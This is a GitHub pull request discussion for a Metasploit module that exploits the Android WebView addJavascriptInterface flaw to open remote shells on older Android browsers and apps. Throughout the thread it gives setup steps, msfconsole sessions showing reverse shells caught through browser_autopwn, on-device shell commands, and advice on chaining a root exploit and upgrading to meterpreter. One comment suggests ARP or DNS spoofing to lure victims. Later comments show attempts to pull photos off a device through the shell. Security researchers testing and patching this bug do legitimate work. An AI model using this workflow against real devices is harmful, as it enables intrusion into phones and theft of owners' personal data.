Skip to content

Android < 4.2 WebView addJavascriptInterface RCE #2942

Merged
merged 12 commits into from Feb 6, 2014
@jvennix-r7

I was rewiring jduck's module for a side-channel attack on embedded Android WebView components, then noticed this actually gets you a shell on some versions of Android's Browser. So hooray, we now have an android browser exploit. Since it is easy to detect the presence of this vuln from JS code, I added it to browser_autopwn as well. A few other Android third party browsers were also vulnerable (notably baidu and QQ browsers: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/)

  • Download the Android SDK, download the 4.1.2 SDK (GoogleAPIs version), and create a new 4.1.2 GoogleAPIs 4.1.2 AVD device
  • Run the simulator for the 4.1.2 device, run the msf module. Open the Android Browser app and browse to the URL specified in the module
  • Shells
@wvu-r7
wvu-r7 commented Feb 4, 2014

Great! Testing!

@wvu-r7
wvu-r7 commented Feb 4, 2014

Hey, @jvennix-r7. Could you link to the specific SDK version?

@jvennix-r7

@wvu-r7 sorry my steps are a little brief. Download the latest sdk, run ./sdk/tools/android, then check the Android 4.2.1 checkbox and click install packages. After it installs, Tools->Manage AVDs and create a new "Google APIs - API Level 16" target device. Then run the emulator ./sdk/tools/emulator -avd <avdname>

@wvu-r7
wvu-r7 commented Feb 4, 2014

Ah, I didn't install the packages. Thanks! Android n00b here. :)

@todb
todb commented Feb 5, 2014
@timwr
timwr commented Feb 5, 2014

It's not just Android devices < 4.2, apps built with sdk version < 4.2 are still vulnerable on Android 4.4.2 You can verify with Baidu 2.1.0.0 on > 4.2 device.
Also the android browser (e.g on the XE12) has camera permissions...

PATH=$PATH:/system/bin
id
uid=10008(app_8) gid=10008(app_8) groups=1006(camera),1015(sdcard_rw),1029(private_cache_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
@jvennix-r7

@todb it affects <4.2 WebView components (including, I believe, "patched" apps recompiled post 4.2 still running on <4.2 devices). I have no idea how many distributions include a vulnerable Browser app.

@jvennix-r7

@timwr okay wow, so even on latest android this affects all apps with WebViews that were never recompiled with sdk version >= 4.2

@wvu-r7
wvu-r7 commented Feb 5, 2014

Works beautifully!

msf > use exploit/android/browser/webview_addjavascriptinterface 
msf exploit(webview_addjavascriptinterface) > exploit 
[*] Exploit running as background job.
msf exploit(webview_addjavascriptinterface) > 
[*] Started reverse handler on 10.6.0.198:4444 
[*] Using URL: http://0.0.0.0:8080/pds2H5RuIEo
[*]  Local IP: http://10.6.0.198:8080/pds2H5RuIEo
[*] Server started.
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:4444 -> 10.6.0.198:51186) at 2014-02-05 11:49:04 -0600

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011
@wvu-r7
wvu-r7 commented Feb 5, 2014

Browser Autopwn:

msf > use auxiliary/server/browser_autopwn 
msf auxiliary(browser_autopwn) > set LHOST 10.6.0.198
LHOST => 10.6.0.198
msf auxiliary(browser_autopwn) > exploit 
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) > 
[*] Setup
[*] Obfuscating initial javascript 2014-02-05 12:12:46 -0600
[*] Done in 0.778086804 seconds

[*] Starting exploit modules on host 10.6.0.198...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qcvLIf
[*]  Local IP: http://10.6.0.198:8080/qcvLIf
[*] Server started.
[snip]
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[snip]
[*] Started reverse handler on 10.6.0.198:6666 
[snip]
[*] Starting the payload handler...

[*] --- Done, found 19 exploit modules

[*] Using URL: http://0.0.0.0:8080/e3mEqsV
[*]  Local IP: http://10.6.0.198:8080/e3mEqsV
[*] Server started.
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV'
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV?sessid=TGludXg6QW5kcm9pZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOnVuZGVmaW5lZDo%3d'
[*] 10.6.0.198       browser_autopwn - JavaScript Report: Linux:Android:undefined:en-US:armle:Chrome:undefined:
[*] 10.6.0.198       browser_autopwn - Reporting: {:os_name=>"Linux", :os_flavor=>"Android", :os_lang=>"en-US", :arch=>"armle"}
[*] 10.6.0.198       browser_autopwn - Responding with 7 exploits
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:6666 -> 10.6.0.198:60458) at 2014-02-05 12:15:16 -0600

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011
@todb-r7
todb-r7 commented Feb 5, 2014

@wchen-r7 wanna eyeball?

#2942

@wvu-r7
wvu-r7 commented Feb 5, 2014

Code looks great, btw.

@jduck
jduck commented Feb 6, 2014

Looks good to me. Thanks for following up on this one. I hadn't considered trying it as a straight HTTP module because I was going after the advertising network SDK stuff =) In hindsight a browser module makes more sense anyway since you can use Karmetasploit, DNS hijacking, DNS spoofing, ARP spoofing, etc to get your victims to visit you too =)

<3

@jduck
jduck commented Feb 6, 2014

PS. It doesn't seem to work against my google glass ..

@wchen-r7
wchen-r7 commented Feb 6, 2014

@jvennix-r7 Please use the browser exploit server mixin and set the requirement to android, thanks.

@jvennix-r7

@wchen-r7 I would like to, but another attack vector for this is injecting the statically-served JS into a webview Component (from mitm position), and browser exploit server kinda subverts this with its detection probe.

@jvennix-r7

thinking on it more, I should be able to override BrowserExploitServer's onurirequest and divert the requests for the js file

@wchen-r7
wchen-r7 commented Feb 6, 2014

If you insist we can land w/ what we have now, not using the mixin isn't a blocker but it's just highly preferred. Let us know what you wanna do.

@jvennix-r7

@wchen-r7 adding it now

@todb-r7
todb-r7 commented Feb 6, 2014

Hey @jvennix-r7 just for next time can you make sure you refer to jduck as @jduck so he'll get alerted when the PR comes up? It's always nice to have @jduck's eyeballs attuned to whatever Android hotness we have coming up.

@joevennix joevennix Use BrowserExploitServer mixin.
This prevents drive-by users on other browsers from ever receiving
the exploit contents.
0dc2ec5
@jvennix-r7

@todb-r7 doh, will remember to do that next time

@jvennix-r7

@wchen-r7 added ExploitServer mixin, re-testing both attack vectors now

@jvennix-r7

Okay, shells are still happening, looks good to me

@wvu-r7
wvu-r7 commented Feb 6, 2014

Okay, looks good. +1 for BES.

@wvu-r7
wvu-r7 commented Feb 6, 2014

Landing!

@wvu-r7 wvu-r7 added a commit that referenced this pull request Feb 6, 2014
@wvu-r7 wvu-r7 Land #2942, @jvennix-r7's Android awesomesauce
Also, thanks to @jduck for testing!
19fff3c
@wvu-r7 wvu-r7 merged commit 362e937 into rapid7:master Feb 6, 2014
@todb-r7
todb-r7 commented Feb 6, 2014

Dear vendors, please up-rev your Androids (and recompile your apps). Signed, The Internet

@jduck
jduck commented Feb 7, 2014

I agree with @todb-r7. This issue needs a lot more attention from the good guys since the bad guys are likely using it in Sochi !@#!#

PS. Found my embarrassing mistake and confirmed code execution works on my Google Glass XE12 too.

@wvu-r7
wvu-r7 commented Feb 7, 2014

@jduck: Thanks for the update! Yeah, this is some serious (and awesome) stuff. :)

@wchen-r7

@rsanz88 Not reproducing the issue atm. Do you see any other errors? Like maybe a " uninitialized constant" or something?

@todb-r7 todb-r7 added a commit that referenced this pull request Feb 13, 2014
@todb-r7 todb-r7 Unbreak the URL refs add nmonkee as ref and author
While @nmonkee didn't actually contribute to #2942, he did publish a
python exploit that leverages WebView, so given our policy of being
loose with author credit, I added him.

Also added a ref to @nmonkee's thing.

@jduck @jvennix-r7 if you have a problem with this, please do say so, I
don't think adding @nmonkee in any way diminishes your work, and I don't
want to appear like we're secretly ripping off people's work. I know you
aren't on this or any other module, and I know @nmonkee doesn't think
that either.
371f23b
@todb
todb commented Feb 14, 2014
@jjbinx
jjbinx commented Feb 20, 2014

Thanks for posting this. It worked without a hitch on my 4.1.2 emulator. I had no success with other emulators at API levels less than 4.1.2 (tried 4.0.3, and 2.3.3). I also tried on a Samsung running 4.1.2 (both default browser and chrome) without success. Is there a definitive way to check for the vulnerability other than running this script? Is there an easy way to figure out which apps are vulnerable? I know a good starting point is if an app can natively display a web page/html, but not all those apps will support javascript (for example I don't think any of the base email apps enable javascript support). thanks.

@jduck
jduck commented Feb 20, 2014

You can use http://www.droidsec.org/tests/addjsif/ to do a quick test.

@jjbinx
jjbinx commented Feb 20, 2014

Thanks! I got basically the same results; the only difference was that my 4.0.3 emulator reported vulnerable vs having the browser app crash with the ms script. None of the browsers on the physical devices I tested reported as vulnerable (most were 4.1.2 or older).

@TheBananaStand

I'm attempting to run this module on a physical device (not an emulator). The specs meet the requirements. It's outfitted with WebView/WebKit, running 2.3 and JavaScript is enabled, but I keep receiving the following error (even when trying out different payloads):

webview_addjavascriptinterface - Exception handling request: undefined method `[]=' for nil:NilClass

Help?

@jduck
jduck commented Feb 28, 2014

Devices < 3.x and >= 4.2 are not affected by the browser issue. See http://www.droidsec.org/news/2014/02/26/on-the-webview-addjsif-saga.html

@TheBananaStand

I'm now attempting to pop a reverse shell on a device running 4.1.1, but I'm still receiving zero output after the exploit HTML is being served to the device. I've tried every possible payload with no noticeable results.

@todb-r7
todb-r7 commented Mar 4, 2014

@TheBananaStand See @jduck's link above -- you may be running into a mitigation by the phone manufacturer or carrier.

@TheBananaStand

That was my initial thought, but after working on resolving the issue for a while longer, I was able to successfully get a Linux shell using the TCP bind payloads. For some reason though, I'm unable to interact with them appropriately (similar to a meterpreter shell) and I'm still unable to pop a shell using a reverse TCP payload. I've tried testing the functionality by creating a malicious APK that contains a reverse TCP shell (via msfpayload) and installing it directly onto the device in order to connect back to my machine, but that has failed as well. Maybe there is a security mechanism preventing these callback connections from establishing.

@chrisdavis925

@TheBananaStand can you give an update on any progress? I have the same result. I have an older device running 4.03 as well as a virtual Android 4.0.3 device running, and both do not properly respond I expect for this exploit.

Metasploit console returns that a new session is started for each device, but any commands passed do not work. I cannot get it to return any response, either.

Any ideas?

Perhaps you can comment further on the success you had with "TCP bind payloads" ?

@TheBananaStand

The bottom line is that reverse TCP shell payloads are not being delivered correctly. The only payload that seems to be working are TCP bind shells. However, when the exploit succeeds and a session is spawned, the interaction with that session is minimal and essentially useless, as seen below:

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

ls
: [1]: ls: not found
echo "wtf"
wtf
cd system
cd asdf
: [4]: cd: /system/asdf: No such file or directory

@jvennix-r7

@TheBananaStand, use /system/bin/ls as the android shell does not have /system/bin in its $PATH. It is strange that reverse TCP is not working correctly, that is what I usually use for testing. Are you sure LHOST is accessible from the device?

You can also try the branch here: #3086

Which will add android meterpreter support and uses a different stager.

@wvu-r7
wvu-r7 commented Apr 16, 2014
export PATH+=":/system/bin"
export PATH="$PATH:/system/bin"
PATH="$PATH:/system/bin"
export PATH
@chrisdavis925

Thanks @jvennix-r7 - that's what I need to get the shell to respond.

Has anyone figured out a root exploit that could be done on 4.x devices using the shell generated? It seems to me that there are a lot of commands that couldn't be executed with this shell. (example - am and pm command don't respond. neither do setprop or getprop)

@timwr
timwr commented Apr 16, 2014

@chrisdavis925 you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script:
timwr@1775f15

@chrisdavis925

@timwr

Wow, yeah that is totally crazy. I am going to try this out tonight and report back if I was able to get this to work. I tried other android root binary exploits but they didn't work, so I'll see if the one you linked does.

Can you confirm that the expected result after executing the android_run_root binary on the target device is that the shell that is already opened by the WebView addJavascriptInterface will automatically elevate to root?

@ghost
ghost commented May 11, 2014

Hello,
i want to install an apk like this: http://drops.wooyun.org/papers/548

But if i don't understand that:
you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script:
timwr@1775f15

With the command ls i get the directory of my android tablet. Thats ok. But how to start adb? I have opened a session with the browser autopwn ....

Thanks and best regards

@todb
todb commented May 11, 2014
@ghost
ghost commented May 16, 2014

Hello

at Freenode IRC i get no answer??? Perhaps you can help me again.

I use KALI Linux and an Android 4.1.2 Tablet for my test. I want to install an App like this:
http://drops.wooyun.org/papers/548

At Kali Linux i use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
msf exploit(webview_addjavascriptinterface) > [] 192.168.178.23 webview_addjavascriptinterface - Gathering target information.
[
] 192.168.178.23 webview_addjavascriptinterface - Sending response HTML.
[] 192.168.178.23 webview_addjavascriptinterface - Serving exploit HTML
[
] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...
export PATH=/system/bin:$PATH
ls -al
drwxr-xr-x root root 2014-05-15 16:56 acct
-rw-r--r-- root root 332 2014-05-15 16:56 boot.txt
drwxrwx--x system cache 2014-05-10 09:22 cache
dr-x------ root root 2014-05-15 16:56 config
lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
drwxrwx--x system system 2014-05-12 09:41 data
-rw-r--r-- root root 129 2014-05-15 16:56 default.prop
drwxr-xr-x root root 2014-05-15 17:12 dev
drwxr-xr-x radio radio 2014-05-09 13:55 efs
lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
-rwxr-x--- root root 105292 2014-05-15 16:56 init
-rwxr-x--- root root 1107 2014-05-15 16:56 init.cm.rc
-rwxr-x--- root root 2344 2014-05-15 16:56 init.goldfish.rc
-rwxr-x--- root root 5171 2014-05-15 16:56 init.p1-common.rc
-rwxr-x--- root root 5389 2014-05-15 16:56 init.p1.rc
-rwxr-x--- root root 936 2014-05-15 16:56 init.p1.usb.rc
-rwxr-x--- root root 17862 2014-05-15 16:56 init.rc
-rwxr-x--- root root 1637 2014-05-15 16:56 init.trace.rc
-rwxr-x--- root root 3915 2014-05-15 16:56 init.usb.rc
-rw-r--r-- root root 1664 2014-05-15 16:56 lpm.rc
drwxrwxr-x root system 2014-05-15 16:56 mnt
dr-xr-xr-x root root 1970-01-01 00:00 proc
drwxr-xr-x root root 2014-05-09 13:55 radio
drwxr-x--- root root 2014-05-15 16:56 sbin
lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
d---r-x--- system sdcard_r 2014-05-15 16:56 storage
drwxr-xr-x root root 2014-05-15 16:56 sys
drwxr-xr-x root root 2014-05-09 13:56 system
-rw-r--r-- root root 272 2014-05-15 16:56 ueventd.goldfish.rc
-rw-r--r-- root root 2035 2014-05-15 16:56 ueventd.p1.rc
-rw-r--r-- root root 5075 2014-05-15 16:56 ueventd.rc
lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor

I want to copy some pictures to my KALI system but there is the problem:
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
/dev/sdc: cannot open for write: Permission denied

Or i want to run adb (no device!)
adb devices

  • daemon not running. starting it now on port 5038 *
  • daemon started successfully * List of devices attached

Can someone help or explain me how to do this?

@todb
todb commented May 17, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.